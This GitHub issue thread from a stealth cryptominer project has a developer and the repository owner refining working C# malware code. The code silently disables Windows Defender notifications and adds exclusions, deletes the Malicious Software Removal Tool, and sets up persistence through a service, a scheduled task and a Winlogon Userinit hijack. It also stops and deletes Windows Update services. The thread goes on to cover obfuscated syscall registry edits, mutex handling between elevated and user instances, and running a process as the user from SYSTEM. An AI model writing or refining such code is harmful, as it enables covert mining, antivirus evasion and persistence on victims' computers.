### ISSUE TITLE
Does this code look correct?

### ISSUE THREAD

**Issue by Alcinzal** [UnamSanctam/SilentCryptoMiner#2371]
Hey Unam, I'm trying to make my own service application that will run the miner, was just wondering if these commands look correct, they mostly do the same as thing as your miner, except I also disable notifications for windows security, since windows security will notify the user about exclusions if a scan is made. I also have multiple startups, not sure if this is actually necesarry, but thought if the service gets deleted, there are still 2 startup methods left. Written in C#:

I am mostly wondering about if Disable MRT, Sleep and Windows Update looks good, as I am unable to test them currently.

```
//Turn off Windows Defender notifications
string command1 = @"reg add ""HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications"" /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64";
string command2 = @"reg add ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter"" /v Enabled /t REG_DWORD /d 0 /f /reg:64";

//Exclusions
string command3 = $@"powershell -Command Add-MpPreference -ExclusionPath @('{programdata_path}', '{current_path}')";

//Disable MRT
string mrt_path = Path.Combine(Environment.SystemDirectory, "MRT.exe");
string command4 = "wusa /uninstall /kb:890830 /quiet /norestart";
string command5 = $"del /f /q {mrt_path}";
string command6 = @"reg add ""HKLM\SOFTWARE\Policies\Microsoft\MRT"" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64";

//Startups
string command7 = $@"sc create ""{program_0_name}"" binpath=""{program_0_path}"" start=""auto""";
string command8 = $@"schtasks /create /f /sc onlogon /rl highest /tn ""{program_0_name}"" /tr ""{program_0_path}""";
string command9 = $@"reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"" /v Userinit /t REG_SZ /d ""C:\Windows\system32\userinit.exe, {current_path},"" /f /reg:64";

//Disable sleep
string command10 = "powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0";

//Disable Windows Update
string reg_services = @"HKLM\SYSTEM\CurrentControlSet\Services\";
string command11 = "sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc";
string command12 = $@"reg copy ""{reg_services}UsoSvc"" ""{reg_services}UsoSvc_bkp"" /s /f & reg delete ""{reg_services}UsoSvc"" /f";
string command13 = $@"reg copy ""{reg_services}WaaSMedicSvc"" ""{reg_services}WaaSMedicSvc_bkp"" /s /f & reg delete ""{reg_services}WaaSMedicSvc"" /f";
string command14 = $@"reg copy ""{reg_services}wuauserv"" ""{reg_services}wuauserv_bkp"" /s /f & reg delete ""{reg_services}wuauserv"" /f";
string command15 = $@"reg copy ""{reg_services}BITS"" ""{reg_services}BITS_bkp"" /s /f & reg delete ""{reg_services}BITS"" /f";
string command16 = $@"reg copy ""{reg_services}dosvc"" ""{reg_services}dosvc_bkp"" /s /f & reg delete ""{reg_services}dosvc"" /f";

Process.Start(new ProcessStartInfo
{
    FileName = "cmd.exe",
    Arguments = $@"/c {command1} & {command2} & {command3} & {command4} & {command5} & {command6} & {command7} & {command8} & {command9} & {command10} & {command11} & {command12} & {command13} & {command14} & {command15} & {command16}",
    Verb = "runas",
    CreateNoWindow = true,
    UseShellExecute = false
}).WaitForExit();
```

**Comment by UnamSanctam** [comment]
Yes that all seems good, multiple startups can help though if your file requires administrator privileges then the Winlogon won't work I believe.

**Comment by Alcinzal** [comment]
Yes that is true. Some parts in my program requires administrator, but the most important parts does not. I was wondering a little about your code when it comes to MRT.exe, since these are the steps that I do:
Uninstall MRT build
`wusa /uninstall /kb:890830 /quiet /norestart`
Delete MRT file
`del /f /q "C:\Windows\System32\MRT.exe"`
Add "DontOfferThroughWUAU" to regedit
`reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64`

However in your code, after deleting MRT there seems to be multiple things you are doing in regedit, but I am struggling a little understanding exactly what:
```
HANDLE hMSRTKey = NULL;
UNICODE_STRING regKey = init_unicode_string(AYU_OBFW(L"\\Registry\\Machine\\SOFTWARE\\Policies\\Microsoft\\MRT"));
InitializeObjectAttributes(&attr, &regKey, AYU_OBFC(OBJ_CASE_INSENSITIVE), NULL, NULL);

if (!NT_SUCCESS(UtOpenKey(&hMSRTKey, AYU_OBFC(KEY_QUERY_VALUE | KEY_SET_VALUE), &attr))) {
    UtCreateKey(&hMSRTKey, AYU_OBFC(KEY_QUERY_VALUE | KEY_SET_VALUE), &attr, 0, NULL, AYU_OBFC(REG_OPTION_NON_VOLATILE), NULL);
}

if (hMSRTKey) {
    DWORD disableMSRT = 1;
    UNICODE_STRING uvalue = init_unicode_string(AYU_OBFW(L"DontOfferThroughWUAU"));
    UtSetValueKey(hMSRTKey, &uvalue, 0, AYU_OBFC(REG_DWORD), &disableMSRT, AYU_OBFC(sizeof(DWORD)));
    UtClose(hMSRTKey);
}
```

**Comment by UnamSanctam** [comment]
They do the same thing, it's just that since I do it all through system calls then I need to do every part manually. So it first opens the registry key, if that fails then it means that the key does not exist so it creates it. Then after that it creates/sets the value "DontOfferThroughWUAU" to 1.

**Comment by Alcinzal** [comment]
Ah okay I see, thank you very much. I was also struggling a little bit with the startups:

Services: Elevated
Task Scheduler: Elevated
Winlogon: User

I would like to prioritize running the program elevated, however I did run into some problems with trying to make this happen, but what I have currently landed on is this: 2 seperate mutexes, one for elevated, one for user. Main loop will, if elevated, check if there are are other processes running with the same name and end them.

Main part of Program.cs
```
[STAThread]
static void Main()
{
    WindowsPrincipal principal = new WindowsPrincipal(WindowsIdentity.GetCurrent());
    bool is_admin = principal.IsInRole(WindowsBuiltInRole.Administrator);

    string GUID = Assembly.GetExecutingAssembly().GetCustomAttribute<GuidAttribute>()?.Value;
    string mutex = $"Global\\{{{is_admin}-{GUID}}}";

    Mutex _mutex = null;
    bool created_new;
    _mutex = new Mutex(false, mutex, out created_new);
    if (created_new)
    {
        Application.EnableVisualStyles();
        Application.SetCompatibleTextRenderingDefault(false);
        Form form1 = new Form1();
        Application.Run();
    }
    else
    {

    }
}
```

A part of my main loop:
```
foreach (Process process in processes)
{
	if (process.ProcessName.ToLower() == program_0_name.ToLower() && process.Id != current_process.Id && is_admin)
	{
		process.Kill();
	}
	...
}
```

Maybe it could be possible to instead check if the admin mutex exists and then kill itself if it is not admin? Not quite sure, do you have any better solutions for this? Or you think this'll work?

**Comment by UnamSanctam** [comment]
I guess that will work, and yes checking for an admin mutex and making the program kill itself if it exists and it's not currently admin would be good.

So it would work like this:

If the program is run as admin:
1. Check for admin mutex
2. a) If it does not exist start the program
    b) If it exists exit

If the program is run as a user:
1. Check for admin mutex
2. a) If it does not exist start the program
    b) If it exists exit
3. Check for user mutex
4. a) If it does not exist start the program
    b) If it exists exit
5. Check for an admin mutex in a loop (not too often) and if it exists then exit

When checking for the admin mutex in a user program don't forget to release the mutex right after checking/creating it.

Making the program itself exit if another mutex exists is easier than enumerating other processes and killing them.

**Comment by Alcinzal** [comment]
Thank you Unam. It took me a little while getting it working, but this is what I got:
Main part of Program.cs
```
WindowsPrincipal principal = new WindowsPrincipal(WindowsIdentity.GetCurrent());
bool is_admin = principal.IsInRole(WindowsBuiltInRole.Administrator);

string guid = Assembly.GetExecutingAssembly().GetCustomAttribute<GuidAttribute>()?.Value;
string mutex_name_0 = $"Global\\{{{is_admin}-{guid}}}";

bool created_new_0;
Mutex mutex_0 = new Mutex(false, mutex_name_0, out created_new_0);
if (created_new_0)
{
    if (!is_admin)
    {
        string mutex_name_1 = $"Global\\{{{!is_admin}-{guid}}}";
        bool created_new_1;
        Mutex mutex_1 = new Mutex(false, mutex_name_1, out created_new_1);
        mutex_1.Dispose();
        if (!created_new_1)
        {
            Environment.Exit(1);
        }

    }
    Application.EnableVisualStyles();
    Application.SetCompatibleTextRenderingDefault(false);
    Form form1 = new Form1();
    Application.Run();
}
```


Part of the main loop (each 30 seconds):
```
if (!is_admin)
{
    string mutex_name = $"Global\\{{{!is_admin}-{guid}}}";
    bool created_new;
    Mutex mutex_1 = new Mutex(false, mutex_name, out created_new);
    mutex_1.Dispose();
    if (!created_new)
    {
        Environment.Exit(1);
    }

}
```

Was just wondering about mutex.Dispose(); - is this safe to use? I tried using ReleaseMutex(); but that just caused the whole application to not run any code after, and just shut down. I read somewhere online with people having issues with the mutex not getting released properly when running dispose. Do you have any thought about this? Or does it seem good? For me it seems to be working well atleast.

**Comment by UnamSanctam** [comment]
Sorry about the late response, I've been sick. 

>Was just wondering about mutex.Dispose(); - is this safe to use? I tried using ReleaseMutex(); but that just caused the whole application to not run any code after, and just shut down. I read somewhere online with people having issues with the mutex not getting released properly when running dispose. Do you have any thoughts about this? Or does it seem good? For me it seems to be working well atleast.

I believe you can only release the mutex if the program is the owner of the mutex, which might be why it waits when you run it (if it already exists). Dispose should work fine.

>Edit: Also another thing, do you know how I could run a normal user elevated process from a system elevated process? Since when using Quasar (currently using it only for troubleshooting, and monitoring if my program works as it should on other computers), if it gets ran through services (system process) screen monitoring doesn't work, however ran as normal admin, it works just fine. I would also assume this is why your miner is unable to fetch the currently active window if the miner is ran through services. So do you have any idea how the service/system process might run another process as user elevated? Thank you.

You would probably have to retrieve the user token from some actively running program and start a program with that, though you can likely do something like this instead: https://github.com/murrayju/CreateProcessAsUser/blob/master/ProcessExtensions/ProcessExtensions.cs

**Comment by Alcinzal** [comment]
> Sorry about the late response, I've been sick.

That's okay, I hope you get better :) Or maybe your already doing good again 😊

> I believe you can only release the mutex if the program is the owner of the mutex, which might be why it waits when you run it (if it already exists). Dispose should work fine.


> You would probably have to retrieve the user token from some actively running program and start a program with that, though you can likely do something like this instead: https://github.com/murrayju/CreateProcessAsUser/blob/master/ProcessExtensions/ProcessExtensions.cs

I will look into that. Thank you so much for your help.
